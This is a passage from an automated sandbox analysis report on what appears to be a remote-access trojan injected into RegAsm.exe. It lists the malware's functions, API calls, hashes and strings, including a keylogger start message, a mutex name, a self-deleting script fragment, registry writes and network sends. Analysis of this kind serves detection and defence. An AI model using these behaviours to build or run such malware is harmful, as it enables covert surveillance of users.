                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID: http://geoplugin.net/json.gp
                                                                • API String ID: 3121278467-91888290
                                                                • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1689 41c482-41c493 1690 41c495-41c498 1689->1690 1691 41c4ab-41c4b2 1689->1691 1692 41c4a1-41c4a9 1690->1692 1693 41c49a-41c49f 1690->1693 1694 41c4b3-41c4cc CreateFileW 1691->1694 1692->1694 1693->1694 1695 41c4d2-41c4d7 1694->1695 1696 41c4ce-41c4d0 1694->1696 1698 41c4f2-41c503 WriteFile 1695->1698 1699 41c4d9-41c4e7 SetFilePointer 1695->1699 1697 41c510-41c515 1696->1697 1701 41c505 1698->1701 1702 41c507-41c50e CloseHandle 1698->1702 1699->1698 1700 41c4e9-41c4f0 CloseHandle 1699->1700 1700->1696 1701->1702 1702->1697
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                • String ID: xpF
                                                                • API String ID: 1852769593-354647465
                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                • API String ID: 782494840-2070987746
                                                                • Opcode ID: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                • Opcode Fuzzy Hash: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                                Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2099061454-0
                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                • String ID: XQG
                                                                • API String ID: 1958988193-3606453820
                                                                • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2099061454-0
                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                • String ID:
                                                                • API String ID: 2152742572-0
                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CountEventTick
                                                                • String ID: !D@$NG
                                                                • API String ID: 180926312-2721294649
                                                                • Opcode ID: 2a410f87322cb94261a9b433236618fb05d81dc4902db218ff2d8141d0bfa05a
                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                • Opcode Fuzzy Hash: 2a410f87322cb94261a9b433236618fb05d81dc4902db218ff2d8141d0bfa05a
                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                • String ID: Offline Keylogger Started
                                                                • API String ID: 465354869-4114347211
                                                                • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
                                                                • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 3360349984-0
                                                                • Opcode ID: b1d94ccb09ae88335c98018fba1659fd9f6643181a77e83682c5dcad394a06c0
                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                • Opcode Fuzzy Hash: b1d94ccb09ae88335c98018fba1659fd9f6643181a77e83682c5dcad394a06c0
                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 3919263394-0
                                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID: Rmc-I89M3S
                                                                • API String ID: 1925916568-1227342801
                                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventObjectSingleWaitsend
                                                                • String ID:
                                                                • API String ID: 3963590051-0
                                                                • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                                • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                                • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                                Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                                                Function 0044F45D Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                                                • _free.LIBCMT ref: 0044F49A
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnvironmentStrings$Free_free
                                                                • String ID:
                                                                • API String ID: 2716640707-0
                                                                • Opcode ID: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                                                • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                                                • Opcode Fuzzy Hash: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                                                • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                                                Function 00413584 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
